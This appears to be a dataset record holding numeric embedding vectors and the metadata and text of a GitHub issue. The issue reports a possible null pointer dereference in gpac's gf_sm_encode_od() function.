-0.002571576042100787, 0.0016408591764047742, 0.0032888916321098804, 0.008485842496156693, -0.003527398919686675, -0.006491705309599638, -0.006359001621603966, 0.016311753541231155, -0.010917541570961475, -0.03302520513534546, -0.017947234213352203, 0.016713451594114304, 0.031906191259622574, -0.02519211918115616, -0.007775699719786644, -0.006592129357159138, -0.010931887663900852, -0.03285304829478264, -0.010874503292143345, -0.009877434000372887, 0.013370760716497898, -0.0008791597792878747, 0.007452907972037792, -0.008112838491797447, 0.0010607303120195866, 0.003516639117151499, 0.0044509428553283215, 0.023140598088502884, 0.01507797185331583, 0.0002483704884070903, -0.0018937129061669111, -0.002031796146184206, 0.0067642852663993835, 0.007811565883457661, 0.006828843615949154, 0.007316618226468563, -0.03302520513534546, -0.013578781858086586, 0.01074538566172123, 0.02928081899881363, -0.013750937767326832, 0.00891623180359602, -0.0130766611546278, -0.012301960960030556, 0.008966444060206413, 0.00468765664845705, -0.033972062170505524, -0.011756801046431065, -0.009733971208333969, 0.0041138045489788055, 0.006552677135914564, 0.013370760716497898, 0.01342814601957798, 0.003385729156434536, 0.029309511184692383, -0.012015034444630146, 0.002150153275579214, 0.008241955190896988, 0.009999377653002739, -0.001608580001629889, -0.0175168439745903, -0.025966821238398552, 0.024273956194519997, -0.021677274256944656, 0.031274955719709396, -0.010688001289963722, -0.006800150964409113, -0.004709176253527403, -0.013255990110337734, 0.013535743579268456, -0.017947234213352203, 0.002682759892195463, -0.01424588542431593, -0.01336358767002821, 0.0029714794363826513, 0.015666170045733452, 0.016182636842131615, -0.009160119108855724, -0.013255990110337734, 0.01827719807624817, -0.004709176253527403, 0.004841879475861788, 0.0022989960853010416, -0.00013169464364182204, -0.029065623879432678, -0.03821856901049614, -0.006703313440084457, -0.0031543949153274298, 0.008657998405396938, -0.0060864221304655075, 0.0031974338926374912, -0.007926336489617825, 0.029338203370571136, -0.02602420561015606, 0.015910057350993156, -0.00739552266895771, -0.010867329314351082, -0.026928024366497993, 0.0027257988695055246, -0.01866454817354679, 0.0005644376506097615, 0.02385791391134262, -0.008844500407576561, 0.01239521149545908, -0.0177033469080925, 0.019037554040551186, -0.015910057350993156, -0.012287613935768604, 0.017287302762269974, -0.003464633831754327, -0.02932385727763176, -0.004892091732472181, -0.005792322568595409, 0.018348930403590202, 0.010114148259162903, -0.005993171129375696, -0.025966821238398552, 0.02192116156220436, -0.0008948510512709618, -0.015192742459475994, 0.01783246360719204, 0.011498567648231983, 0.01804765686392784, -0.0061617400497198105, 0.007173154968768358, -0.01239521149545908, 0.005569954868406057, -0.005770802963525057, 0.0076035442762076855, 0.016842568293213844, 0.006853949744254351, 0.004153256770223379, 0.03351297974586487, -0.00898079015314579, -0.01691429875791073, 0.01968313753604889, -0.010092629119753838, 0.003611683612689376, -0.0028728486504405737, 0.014683447778224945, 0.02015656605362892, -0.006290856748819351, -0.01691429875791073, 0.003380349138751626, 0.01619698293507099, 0.01012849435210228, 0.010953407734632492, 0.003446700982749462, 0.00548029039055109, 0.022968441247940063, -0.00014514430949930102, -0.0012257128255441785, 0.02879304438829422, -0.011211641132831573, -0.031504496932029724, 0.0081415306776762, -0.01787550188601017, 0.012316307052969933, -0.004745041951537132, 0.010106975212693214, 0.01450411882251501, -0.009239023551344872, 0.00869386363774538, 0.012359346263110638, 0.00885167345404625, -0.025737280026078224, 0.0179185401648283, 0.02166292816400528, 0.00898079015314579, -0.007890470325946808, 0.012502809055149555, 0.0019313719822093844, -0.0005155705148354173, 0.012689311057329178, -0.032910436391830444, 0.016713451594114304, -0.008686690591275692, -0.000044243795855436474, 0.01417415402829647, -0.00807697232812643, 0.020974304527044296, -0.008177396841347218, -0.00992764625698328, 0.009152946062386036, -0.010307823307812214, -0.0020192430820316076, -0.004060005769133568, -0.01349270436912775, -0.009404006414115429, 0.006194019224494696, -0.008650824427604675, -0.010049589909613132, 0.01382266916334629, 0.0038161184638738632, -0.024331340566277504, -0.019439250230789185, -0.0075748516246676445, 0.004400730598717928, 0.00774700753390789, -0.0015180188929662108, 0.013829843141138554, -0.014339136891067028, -0.013815496116876602, -0.00107059336733073, -0.0033516567200422287, 0.018592817708849907, 0.016082214191555977, 0.011871571652591228, 0.016526948660612106, -0.010774078778922558, -0.0042465077713131905, -0.01512101013213396, 0.0038806768134236336, 0.01377963088452816, -0.0228536706417799, -0.0018793665803968906, 0.03204965591430664, 0.011498567648231983, 0.02457522787153721, -0.010221745818853378, -0.024331340566277504, 0.036783937364816666, 0.01124750729650259, -0.0030127251520752907, -0.00006315738573903218, -0.008306513540446758, 0.03371382877230644, -0.006699726916849613, 0.003834051312878728, -0.003240472637116909, -0.00695437379181385, -0.0199844092130661, 0.012696484103798866, -0.02183508314192295, -0.007158808410167694, 0.00010003188799601048, -0.022480666637420654, 0.0018452941440045834, -0.0061617400497198105, 0.025464700534939766, 0.011053831316530704, -0.00005766544200014323, 0.011563125997781754, 0.006911334581673145, 0.020328721031546593, 0.0016668618191033602, -0.015465321950614452, -0.019181016832590103, 0.000916818855330348, 0.01067365426570177, 0.005049901083111763, -0.007854605093598366, 0.008686690591275692, 0.013578781858086586, 0.01659868098795414, -0.0033929022029042244, -0.001522502163425088, -0.013923093676567078, -0.014052210375666618, 0.00012553020496852696, 0.011104043573141098, 0.008708209730684757, 0.0047199358232319355, 0.018908435478806496, 0.025866396725177765, -0.00243169954046607, -0.01800461858510971, 0.018736280500888824, 0.0004066282126586884, 0.0057062446139752865, -0.011742454953491688, -0.014382175169885159, 0.000705659098457545, 0.00270786602050066, -0.01821981370449066, 0.01642652414739132, 0.009547469206154346, 0.00716598192229867, -0.007775699719786644, 0.00023783491633366793, -0.011233160272240639, -0.0008858846267685294, -0.0070727309212088585, 0.017072109505534172, 0.008019587025046349, 0.0018704001558944583, 0.009439871646463871, -0.007840258069336414, -0.010501498356461525, -0.009145772084593773, -0.017502497881650925, -0.006595715880393982, 0.0004922577645629644, 0.011850051581859589, 0.011756801046431065, -0.02055826224386692, -0.0027437317185103893, 0.024316994473338127, -0.03368513658642769, -0.010881676338613033, 0.014669101685285568, 0.007567678578197956, 0.0019367518834769726, -0.0317053459584713, 0.0011512914206832647, 0.026425901800394058, 0.012761042453348637, 0.005799495615065098, 0.0001673362567089498, 0.00124095578212291, 0.013198604807257652, -0.012237402610480785, 0.01192895695567131, -0.008084145374596119, 0.016039174050092697, 0.003500499529764056, -0.0023868673015385866, 0.0011790873249992728, -0.007474427577108145, -0.006671034265309572, -0.009999377653002739, 0.00010361846216255799, -0.015580092556774616, 0.020142218098044395, 0.014848430640995502, 0.009561815299093723, 0.012495636008679867, 0.01638348586857319, -0.009655066765844822, 0.02055826224386692, 0.0024908781051635742, 0.01294037140905857, -0.006642341613769531, -0.009647893719375134, -0.012839946895837784, 0.009870260953903198, 0.011046658270061016, 0.017201226204633713, -0.016699105501174927, 0.015465321950614452, -0.010185879655182362, 0.0034592540469020605, -0.019396210089325905, -0.018965821713209152, 0.013091008178889751, 0.02417353168129921, -0.02910866215825081, 0.018650202080607414, 0.01355726271867752, 0.010099802166223526, -0.036525703966617584, -0.0027240056078881025, 0.0042931330390274525, 0.004992515780031681, 0.0020138632971793413, 0.00017719934112392366, 0.0008984376327134669, -0.02689933031797409, -0.0032243330497294664, -0.020486529916524887, 0.013600301928818226, 0.015207088552415371, -0.007940682582557201, 0.0020084832794964314, 0.01375811081379652, -0.00006354966899380088, -0.003435941180214286, -0.02809007465839386, 0.02500561811029911, 0.006082835141569376, 0.002788563957437873, -0.007847431115806103, -0.00869386363774538, -0.008722556754946709, 0.014088076539337635, 0.01760292239487171, -0.002456805668771267, 0.015307512134313583, -0.010114148259162903, -0.02398703061044216, 0.023542294278740883, 0.021289924159646034, -0.01560878474265337, 0.03219312056899071, 0.022308511659502983, -0.019338825717568398, 0.0046733105555176735, -0.002112494083121419, 0.006624408531934023, -0.001468703499995172, -0.011104043573141098, 0.0341729111969471, -0.000860330241266638, 0.012158497236669064, 0.01821981370449066, -0.012933198362588882, -0.006785804405808449, 0.0187506265938282, 0.0024980511516332626, 0.013026448898017406, -0.001186260487884283, 0.01704341545701027, 0.0027168323285877705, 0.005634513217955828, 0.015522707253694534, 0.023829219862818718, 0.011477047577500343, 0.017846809700131416, 0.0021089075598865747, -0.008084145374596119, -0.005053487606346607, 0.0001945718249771744, 0.00840693712234497, -0.004110217560082674, 0.0033749693538993597, 0.005440838169306517, 0.0020569022744894028, -0.01743076555430889, -0.016971684992313385, 0.00434693181887269, 0.02324102260172367, -0.014496945776045322, -0.00664951466023922, -0.03098803013563156, 0.021863775327801704, 0.029869016259908676, -0.017574230208992958, 0.015049278736114502, 0.019381863996386528, 0.01452563889324665, -0.009317927993834019, -0.022179394960403442, 0.004210642073303461, 0.0071193561889231205, -0.010200226679444313, 0.0010867329547181726, -0.00009666947153164074, 0.0037372137885540724, 0.0035094660706818104, -0.01144835539162159, -0.0042931330390274525, -0.004945890512317419, -0.03202096372842789, -0.0177033469080925, -0.0011620511068031192, -0.00027908055926673114, -0.03104541450738907, -0.006950787268579006, -0.018191121518611908, -0.02236589789390564, -0.0026056484784930944, -0.00699023948982358, 0.01866454817354679, -0.006376934703439474, -0.011527259834110737, -0.0006832429789938033, -0.005824601743370295, 0.01725861057639122, 0.018435008823871613, 0.0006859329296275973, -0.02857784926891327, 0.004203468561172485, 0.00911707989871502, 0.022136356681585312, 0.017760731279850006, 0.0329391285777092, 0.018478047102689743, -0.023700103163719177, -0.031102798879146576, -0.019668791443109512, 0.018119389191269875, -0.002291823038831353, -0.03259481489658356, 0.00009650135325500742, -0.012180017307400703, -0.008457149378955364, -0.010487152263522148, 0.00314901489764452, 0.0019869639072567225, 0.00048418797086924314, 0.0075748516246676445, -0.004902851302176714, 0.0043218256905674934, -0.012882986105978489, 0.015795286744832993, -0.021634235978126526, 0.007488773670047522, 0.0002669758687261492, 0.01730164885520935, 0.008507361635565758, 0.010271958075463772, 0.020802149549126625, 0.0024388725869357586, -0.001831844449043274, -0.001943924929946661, -0.008715382777154446, -0.009547469206154346, -0.01164920348674059, -0.009848741814494133, 0.014253058470785618, 0.008091318421065807, -0.0063948677852749825, 0.023570986464619637, 0.013729418627917767, 0.02311190590262413, 0.0017072109039872885, -0.01774638518691063, 0.001553884707391262, -0.024374380707740784, 0.006706899963319302, -0.016225676983594894, 0.003963168244808912, -0.027674032375216484, -0.00040752487257122993, 0.006283683702349663, 0.00840693712234497, -0.012409557588398457, 0.0187506265938282, 0.01576659455895424, -0.014123941771686077, -0.013177085667848587, 0.004167602863162756, 0.0164695642888546, 0.005125219002366066, -0.00411739107221365, -0.002539296867325902, 0.008241955190896988, -0.0064414930529892445, 0.006567023228853941, 0.015522707253694534, -0.004795254208147526, -0.01734468899667263, 0.004433009773492813, 0.023140598088502884, -0.00910990685224533, -0.0036834150087088346, 0.004379210993647575, -0.03130364790558815, -0.012911679223179817, 0.019697483628988266, 0.003751560114324093, 0.019496634602546692, 0.002810083329677582, 0.00030463491566479206, -0.003722867462784052, -0.0015888537745922804, 0.02351360209286213, 0.008184569887816906, -0.008112838491797447, 0.0118428785353899, -0.02725798822939396, -0.0014265611534938216, 0.010644962079823017, 0.005824601743370295, 0.046424657106399536, -0.0056488593108952045, 0.01572355628013611, -0.00018818324315361679, 0.014963201247155666, -0.0009114390122704208, -0.008729729801416397, -0.006728419102728367, 0.009346621111035347, -0.0189371295273304, -0.02227981947362423, 0.006703313440084457, 0.013191431760787964, -0.00862930528819561, -0.00660288892686367, 0.0129690645262599, -0.01964009739458561, -0.006061316002160311, -0.017057761549949646, -0.020931266248226166, 0.01443956047296524, 0.012093938887119293, 0.009332274086773396, -0.015034932643175125, 0.0011172188678756356, -0.016139598563313484, 0.0005536779062822461, -0.00889471173286438, 0.00418194942176342, -0.0129690645262599, 0.02989771030843258, 0.0006070282543078065, 0.010221745818853378, -0.006796564441174269, -0.0007303168531507254, 0.024202223867177963, 0.01375811081379652, 0.027286680415272713, -0.0020425559487193823, -0.011484220623970032, 0.0028118768241256475, -0.016799528151750565, 0.009382486343383789, -0.018119389191269875, -0.007682448718696833, 0.01274669636040926, -0.007022518664598465, 0.024101801216602325, -0.006667447276413441, 0.007097836583852768, 0.027903571724891663, 0.005333240609616041, -0.021863775327801704, 0.0008661584579385817, -0.005387039389461279, -0.01067365426570177, -0.007696795277297497, -0.02958209067583084, -0.015379244461655617, -0.022021586075425148, 0.011914609931409359, -0.021519465371966362, 0.011405316181480885, -0.0005115356179885566, -0.02755926176905632, 0.02073041722178459, 0.011828532442450523, -0.0040707653388381, -0.0002858053776435554, 0.006007517222315073, 0.003645756049081683, -0.0057062446139752865, -0.004658963996917009, -0.0042178151197731495, 0.009339448064565659, -0.021619888022542, -0.0026648270431905985, -0.011218814179301262, -0.008550400845706463, -0.01619698293507099, 0.00044540807721205056, -0.01239521149545908, 0.021949853748083115, -0.005616580136120319, 0.00022797183191869408, 0.01076690573245287, 0.00022797183191869408, -0.001351243001408875, 0.0031328753102570772, -0.0018793665803968906, 0.022179394960403442, -0.001863226993009448, -0.024101801216602325, -0.023083211854100227, 0.0018112215911969543, -0.016656065359711647, -0.0015879571437835693, -0.007226953748613596, 0.012961890548467636, 0.021433386951684952, -0.001981584122404456, -0.0040133800357580185, -0.008729729801416397, -0.01883670501410961, -0.0037336270324885845, -0.001662378665059805, 0.01494885515421629, -0.016053520143032074, 0.005157498177140951, 0.01377963088452816, 0.00043688996811397374, 0.010530191473662853, -0.009540296159684658, -0.005067834164947271, 0.0010105181718245149, -0.0012570953695103526, -0.003050384111702442, -0.005892746616154909, 0.01336358767002821, 0.006556263659149408, -0.03394336998462677, 0.00840693712234497, 0.014547158032655716, -0.0065383305773139, 0.01862150989472866, 0.01989833265542984, -0.0005810255534015596, 0.012294787913560867, -0.0036475493106991053, 0.010451287031173706, 0.004856226034462452, 0.0073811765760183334, 0.013263163156807423, 0.02087388001382351, 0.009877434000372887, 0.021691620349884033, -0.014346309937536716, 0.0021089075598865747, 0.015149703249335289, 0.02030002884566784, -0.02293974906206131, 0.015106664039194584, 0.0013682793360203505, -0.022179394960403442, 0.01953967474400997, 0.012868640013039112, -0.008880365639925003, -0.01192895695567131, -0.0000947641019592993, -0.03164795786142349, 0.0066172354854643345, 0.009239023551344872, -0.008837326429784298, 0.0002211349201388657, 0.0024119734298437834, 0.018391968682408333, 0.01487712375819683, 0.01233065314590931, 0.014224366284906864, -0.0008639168227091432, 0.005458770785480738, 0.010601922869682312, -0.003041417570784688, -0.00489926477894187, -0.0141095956787467, -0.012251748703420162, 0.01499189343303442, -0.0004891194985248148, -0.007402695715427399, 0.007424215320497751, -0.009482910856604576, -0.017287302762269974, 0.005835361313074827, -0.0073524839244782925, 0.005652446299791336, 0.023829219862818718, 0.02196419984102249, -0.018463701009750366, 0.009518777020275593, 0.004988929256796837, -0.018635855987668037, 0.009655066765844822, 0.004709176253527403, -0.005372692830860615, 0.03055763989686966, -0.02747318334877491, -0.02215070277452469, -0.008622132241725922, 0.011943303048610687, -0.007876124233007431, 0.005089353304356337, -0.007567678578197956, -0.0029230606742203236, -0.022136356681585312, -0.01634044758975506, -0.008033933117985725, 0.01576659455895424, 0.011376623995602131, 0.0023061693646013737, -0.013004929758608341, 0.01008545607328415, -0.0030127251520752907, 0.009231850504875183, 0.0059859976172447205 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
https://github.com/gpac/gpac/blob/c5d2a6fc6b0ddccf8e4f60757d024e0b183c531e/src/scene_manager/encode_isom.c#L1291-L1297 There are several places where the esd->decoderConfig are not checked before they are referenced.
Possible null pointer dereference in gf_sm_encode_od()
https://api.github.com/repos/gpac/gpac/issues/1806/comments
0
2021-05-25T14:01:23
2021-05-25T15:07:08Z
https://github.com/gpac/gpac/issues/1806
900,856,687
1,806
false
This is a GitHub Issue repo:gpac owner:gpac Title : Possible null pointer dereference in gf_sm_encode_od() Issue date: --- start body --- https://github.com/gpac/gpac/blob/c5d2a6fc6b0ddccf8e4f60757d024e0b183c531e/src/scene_manager/encode_isom.c#L1291-L1297 There are several places where the esd->decoderConfig are not checked before they are referenced. --- end body ---
376
[ -0.0012319523375481367, 0.053038500249385834, -0.01027748268097639, 0.021456880494952202, -0.013594207353889942, 0.025340940803289413, -0.019318467006087303, 0.03284721076488495, -0.009957447648048401, 0.007142595946788788, -0.025864634662866592, 0.023566201329231262, 0.021456880494952202, 0.04064442589879036, -0.0016883655916899443, 0.04591045156121254, -0.00946284830570221, -0.0034749237820506096, -0.0030603331979364157, -0.003482197178527713, 0.043670207262039185, -0.046492334455251694, -0.001609266153536737, 0.015638066455721855, -0.00011364873353159055, 0.016307229176163673, -0.03534930199384689, 0.00036458513932302594, -0.006553440820425749, -0.005760627333074808, 0.00840818788856268, 0.010662979446351528, -0.008560932241380215, 0.01407425943762064, 0.04922717809677124, 0.013805138878524303, 0.026693815365433693, 0.031101567670702934, -0.006127940025180578, 0.029035888612270355, -0.007040766533464193, -0.041866376996040344, -0.0334290936589241, 0.003742225468158722, -0.007371711544692516, 0.017281880602240562, 0.010146559216082096, 0.019405748695135117, -0.016772735863924026, 0.0021875109523534775, 0.023697124794125557, -0.04041167348623276, -0.020642247051000595, -0.06266864389181137, -0.009266463108360767, -0.03948066011071205, 0.020453136414289474, 0.009906533174216747, -0.0032985408324748278, 0.040586236864328384, -0.024133536964654922, 0.01930391974747181, -0.012204964645206928, -0.004902351647615433, 0.009870165027678013, 0.014925261028110981, -0.009942900389432907, 0.00837182067334652, 0.00036413053749129176, 0.0014101534616202116, 0.010939372703433037, -0.05053640902042389, -0.027668466791510582, 0.052252959460020065, 0.04573588818311691, -0.034156445413827896, 0.04669599235057831, 0.04797613248229027, -0.004876894410699606, -0.005633340682834387, 0.002943956758826971, 0.007029856089502573, -0.01413244754076004, -0.007615374401211739, 0.005749716889113188, -0.041226305067539215, -0.02269337885081768, -0.06674180924892426, 0.005029638297855854, -0.01123031321913004, -0.0066407229751348495, 0.022402439266443253, -0.017180051654577255, 0.014765243977308273, 0.02193693444132805, -0.013201436959207058, -0.033516377210617065, -0.01053932961076498, 0.005426045041531324, 0.0024893619120121002, -0.027072038501501083, -0.018954791128635406, 0.008415461517870426, 0.025457317009568214, 0.007819033227860928, 0.011004834435880184, 0.036338500678539276, 0.0035531141329556704, 0.01854747347533703, 0.12789756059646606, 0.0072298781014978886, -0.04099355265498161, -0.007586280349642038, -0.009251915849745274, 0.009244643151760101, 0.012088588438928127, -0.03139250725507736, -0.026882926002144814, 0.023129791021347046, -0.023566201329231262, 0.0023493466433137655, -0.025791898369789124, -0.006993488408625126, 0.020802265033125877, -0.01667090505361557, 0.05399860441684723, -0.014910713769495487, -0.022096950560808182, -0.03822961822152138, -0.010961193591356277, -0.02352256141602993, -0.03555295988917351, 0.010190200060606003, 0.003125794930383563, 0.008219076320528984, 0.0031385235488414764, -0.02164599299430847, 0.021689634770154953, 0.008117247372865677, 0.009004616178572178, -0.0875149816274643, -0.03182892128825188, 0.03694947808980942, -0.02577735111117363, -0.027799390256404877, -0.0064879790879786015, 0.0020329486578702927, 0.03549477458000183, -0.05280574783682823, -0.007309886626899242, -0.029064983129501343, -0.01204494759440422, 0.008495470508933067, -0.011128484271466732, 0.0438738688826561, 0.02072952874004841, 0.009557404555380344, 0.003018510527908802, -0.0445721261203289, 0.023464372381567955, -0.011113937012851238, -0.01757282204926014, 0.009513762779533863, -0.02653379738330841, -0.010248388163745403, -0.03860783949494362, 0.02107865922152996, 0.006495252717286348, -0.021631445735692978, 0.022897038608789444, -0.03412735089659691, 0.011543074622750282, -0.024555400013923645, -0.012837761081755161, -0.03488379716873169, -0.02905043587088585, 0.017063675448298454, 0.02186419814825058, -0.03540749102830887, -0.0025875545106828213, -0.025151828303933144, 0.0034149172715842724, 0.01572534814476967, 0.010408406145870686, 0.014539764262735844, -0.014525217935442924, 0.02472996525466442, -0.015536236576735973, 0.02001672424376011, -0.03051968663930893, 0.013092334382236004, -0.001506527652963996, 0.010801175609230995, -0.016845470294356346, 0.023798953741788864, -0.02152961678802967, -0.05373675748705864, -0.02129686437547207, -0.023347996175289154, -0.00884459912776947, 0.018111063167452812, 0.0021111390087753534, 0.019580313935875893, 0.011201219633221626, -0.02299886755645275, -0.015943553298711777, -0.02857038378715515, 0.02480269968509674, 0.0035312934778630733, -0.04195365682244301, -0.012946863658726215, -0.053154878318309784, 0.03337090462446213, -0.013186889700591564, -0.009404660202562809, 0.013586933724582195, -0.027493901550769806, -0.00630250433459878, -0.004935082513839006, -0.00846637599170208, 0.048412542790174484, -0.011506707407534122, 0.014721602201461792, -0.0061133927665650845, -0.005520600825548172, -0.011644904501736164, 0.0023020687513053417, -0.00916463416069746, 0.0063825128600001335, 0.01655452884733677, 0.01787831075489521, 0.016845470294356346, 0.019260277971625328, -0.029966898262500763, -0.005920644383877516, -0.0031567073892802, 0.0346219502389431, -0.017369164153933525, -0.01870749145746231, 0.005084190052002668, -0.014707055874168873, 0.049576304852962494, -0.02017674222588539, -0.013972430489957333, -0.012801393866539001, 0.056995294988155365, 0.0015774444909766316, -0.022111497819423676, 0.010415679775178432, 0.026242857798933983, -0.01172491256147623, -0.05091463401913643, -0.0013456010492518544, 0.005917007569223642, 0.0037349520716816187, 0.004767791833728552, 0.02347891964018345, 0.04131358861923218, -0.027799390256404877, -0.023158885538578033, 0.012532273307442665, -0.02878858894109726, -0.004484124481678009, -0.041226305067539215, -0.0206276997923851, -0.018678396940231323, -0.008386367931962013, -0.002689383691176772, -0.004127722233533859, -0.010488414205610752, 0.04445574805140495, -0.024133536964654922, -0.055831532925367355, -0.003709494834765792, 0.0053023952059447765, 0.020569512620568275, 0.008459102362394333, 0.01518710795789957, 0.01134668942540884, 0.02574825845658779, -0.02539912797510624, -0.02280975505709648, -0.027348432689905167, 0.020525870844721794, 0.007244424894452095, 0.032905399799346924, 0.007149869110435247, 0.006520709954202175, -0.00666981702670455, 0.013994250446557999, 0.03607665374875069, 0.021995121613144875, -0.061737630516290665, 0.015667160972952843, -0.01544895488768816, 0.020147647708654404, -0.005233297124505043, 0.005098736844956875, -0.031741637736558914, 0.00563697749748826, -0.006920753512531519, 0.012423170730471611, -0.017223693430423737, -0.003267628373578191, -0.0426810085773468, -0.003333090106025338, -0.032992683351039886, -0.03395278751850128, 0.000033611613616812974, 0.013623300939798355, 0.04142996296286583, -0.05207839608192444, -0.01780557446181774, -0.03526202216744423, 0.005378767382353544, -0.02646106295287609, -0.018823867663741112, -0.007913588546216488, -0.004796885885298252, 0.04195365682244301, -0.01228497363626957, -0.00769538339227438, -0.009615592658519745, -0.0266792681068182, 0.024366289377212524, -0.007218967657536268, -0.007098954636603594, 0.023420730605721474, -0.08629303425550461, 0.0038876959588378668, 0.021384146064519882, 0.016016289591789246, 0.03078153356909752, -0.02838127128779888, 0.002367530483752489, -0.023464372381567955, -0.033778224140405655, -0.00496781338006258, 0.01128850132226944, -0.026170121505856514, 0.01595810055732727, -0.013179617002606392, 0.027973953634500504, -0.02081681229174137, 0.0022729746997356415, -0.006964394357055426, 0.012183144688606262, -0.010342944413423538, 0.02307160198688507, -0.006786193232983351, 0.000750990875530988, 0.010299302637577057, 0.01697639375925064, -0.016321776434779167, 0.02326071448624134, 0.006291593890637159, -0.027799390256404877, -0.010757534764707088, -0.005095100030303001, 0.01738371141254902, 0.017398256808519363, -0.0348547026515007, 0.015012543648481369, 0.031479790806770325, 0.0037531359121203423, 0.02238789200782776, 0.01591446064412594, -0.021238675341010094, 0.03680400550365448, -0.0071316855028271675, -0.006397060118615627, 0.010342944413423538, -0.04716149717569351, -0.00848819687962532, -0.0055060540325939655, 0.016379965469241142, 0.01163035724312067, 0.02302796207368374, -0.03680400550365448, 0.022824302315711975, -0.02382804825901985, 0.014357926324009895, 0.00044618494575843215, -0.030927002429962158, 0.009608319029211998, 0.03625122085213661, -0.04332108050584793, 0.07197874784469604, -0.020787717774510384, -0.013114155270159245, -0.04681237041950226, 0.04317560791969299, -0.005575152579694986, -0.03523292765021324, 0.0066479966044425964, 0.016656359657645226, -0.003256718162447214, -0.013485104776918888, 0.006047931034117937, -0.0212241280823946, 0.0098410714417696, -0.02186419814825058, -0.00570243876427412, 0.0012874128296971321, -0.003616757458075881, 0.02665017358958721, 0.014685234986245632, 0.014263371005654335, 0.02976324036717415, 0.011441245675086975, 0.007644468452781439, -0.03523292765021324, -0.02777029573917389, -0.014001524075865746, 0.029705051332712173, 0.036454878747463226, -0.011317595839500427, 0.03389459848403931, -0.018227439373731613, 0.010146559216082096, -0.022038763388991356, 0.024526305496692657, -0.001963850110769272, 0.02077317051589489, 0.05103100836277008, 0.008517290465533733, -0.03590209037065506, 0.033923693001270294, 0.053794946521520615, -0.0126850176602602, 0.00452412897720933, -0.00858275219798088, -0.013121428899466991, -0.019172996282577515, 0.005171472206711769, -0.01483070570975542, -0.02539912797510624, -0.03011236898601055, -0.014779791235923767, 0.01010291837155819, -0.020380400121212006, 0.0259664636105299, -0.004578680265694857, 0.021165940910577774, 0.031625259667634964, -0.04791794344782829, -0.047772474586963654, -0.0365130640566349, 0.03075243905186653, -0.002903952496126294, -0.004505944903939962, 0.005396950989961624, 0.021515069529414177, -0.023115243762731552, 0.014597952365875244, 0.02264973893761635, -0.01192857138812542, -0.0038440548814833164, 0.03526202216744423, 0.007949956692755222, -0.035698432475328445, 0.020744075998663902, -0.004265918862074614, 0.004455030430108309, 0.03372003510594368, 0.0018538382137194276, -0.01603083685040474, -0.032498084008693695, 0.00776084465906024, -0.02055496536195278, 0.005378767382353544, 0.00316579919308424, 0.0015747168799862266, -0.0013365091290324926, -0.013936062343418598, 0.037618640810251236, -0.014910713769495487, 0.0037822299636900425, 0.017820121720433235, -0.017107317224144936, -0.0017683743499219418, -0.011186672374606133, 0.004556859843432903, 0.030432403087615967, -0.006600718479603529, -0.00001849633190431632, 0.034156445413827896, 0.015230748802423477, -0.005826088599860668, -0.004164089914411306, -0.0005823360988870263, 0.028439460322260857, 0.008640940301120281, -0.018823867663741112, 0.01336145494133234, -0.012161323800683022, -0.0033530923537909985, -0.004975087009370327, 0.02283884957432747, 0.019289372488856316, -0.010408406145870686, -0.012510452419519424, 0.0666254386305809, -0.005498780403286219, 0.001594719011336565, -0.028061237186193466, -0.011812195181846619, 0.026431968435645103, -0.00743353646248579, -0.002691202098503709, 0.00044641224667429924, -0.029937803745269775, -0.010292029939591885, -0.03834599256515503, 0.00525875436142087, 0.004742334596812725, 0.009208275005221367, 0.014314285479485989, 0.008655487559735775, 0.015405313111841679, -0.016467247158288956, -0.009470121935009956, 0.010808449238538742, 0.06255226582288742, 0.021631445735692978, 0.06319233030080795, 0.010088371112942696, 0.013616027310490608, -0.00846637599170208, -0.01272138487547636, -0.02947229892015457, -0.013288719579577446, -0.004855073988437653, 0.03578571230173111, 0.0031167028937488794, -0.012495906092226505, -0.01621994748711586, 0.011135757900774479, 0.0031567073892802, -0.0022984319366514683, -0.008968248963356018, 0.036600347608327866, -0.043030139058828354, 0.0050332751125097275, -0.009601045399904251, 0.021616898477077484, -0.005877003539353609, -0.01228497363626957, -0.02091864123940468, -0.010342944413423538, 0.007717203814536333, -0.02397351898252964, -0.005807904992252588, 0.01870749145746231, -0.014212456531822681, 0.005444229114800692, -0.01768919825553894, 0.046346861869096756, 0.011099389754235744, 0.006138850003480911, 0.01723824068903923, 0.0026511976029723883, 0.014437935315072536, -0.03965522721409798, 0.029152264818549156, 0.015245296061038971, -0.020351305603981018, 0.010706620290875435, -0.028730399906635284, -0.018081968650221825, -0.003693129401654005, -0.022096950560808182, 0.014088806696236134, 0.005367856938391924, -0.004054986871778965, -0.006986215244978666, 0.010088371112942696, 0.005789721384644508, -0.002711204346269369, -0.020976828411221504, -0.019798519089818, -0.05309668928384781, -0.00948466919362545, 0.01572534814476967, 0.0032749020028859377, 0.0004986906424164772, 0.009448301047086716, -0.0027493902016431093, 0.027304790914058685, -0.011143031530082226, 0.015143467113375664, 0.0007064405363053083, 0.014154268428683281, -0.006858928594738245, -0.0016647266456857324, -0.00808815285563469, 0.013463283888995647, 0.019783971831202507, -0.01324507873505354, -0.029792334884405136, -0.029850522056221962, 0.020234929397702217, -0.015783537179231644, -0.035843901336193085, -0.02502090483903885, 0.0069171166978776455, -0.0010492050787433982, -0.001609266153536737, -0.035058360546827316, 0.02923954650759697, -0.021966027095913887, 0.03465104475617409, 0.030839720740914345, -0.013237805105745792, 0.0005123285227455199, 0.00026593805523589253, 0.014088806696236134, 0.007342617493122816, 0.010212020948529243, 0.022227874025702477, 0.03278902545571327, -0.020234929397702217, 0.007211694028228521, -0.023013414815068245, 0.002734843175858259, 0.04169180989265442, 0.01324507873505354, -0.02205331064760685, -0.001835654373280704, -0.018809320405125618, -0.023129791021347046, 0.008044512011110783, -0.017558274790644646, -0.025791898369789124, -0.02160235121846199, 0.0141106266528368, -0.0002095682721119374, -0.005051459185779095, -0.0038295078556984663, 0.028919512405991554, 0.009346472099423409, 0.010815722867846489, -0.05158379673957825, -0.010728440247476101, -0.007044403348118067, 0.000631887000054121, 0.007862674072384834, 0.0017647375352680683, 0.007309886626899242, 0.015856271609663963, -0.019856706261634827, -0.040818989276885986, 0.01963850110769272, 0.006815287284553051, 0.0348547026515007, -0.008451828733086586, 0.031247038394212723, 0.0140524385496974, -0.0010810267413035035, -0.006120666395872831, -0.018649302423000336, -0.03267264738678932, -0.022533362731337547, -0.03357456251978874, -0.006931663490831852, 0.014721602201461792, 0.0020838631317019463, -0.0002963959123007953, -0.03459285572171211, -0.0010401132749393582, 0.0018474739044904709, -0.015565331093966961, 0.0055787889286875725, -0.009470121935009956, 0.009397386573255062, -0.0008169070933945477, -0.022184234112501144, 0.014328832738101482, -0.01475069671869278, 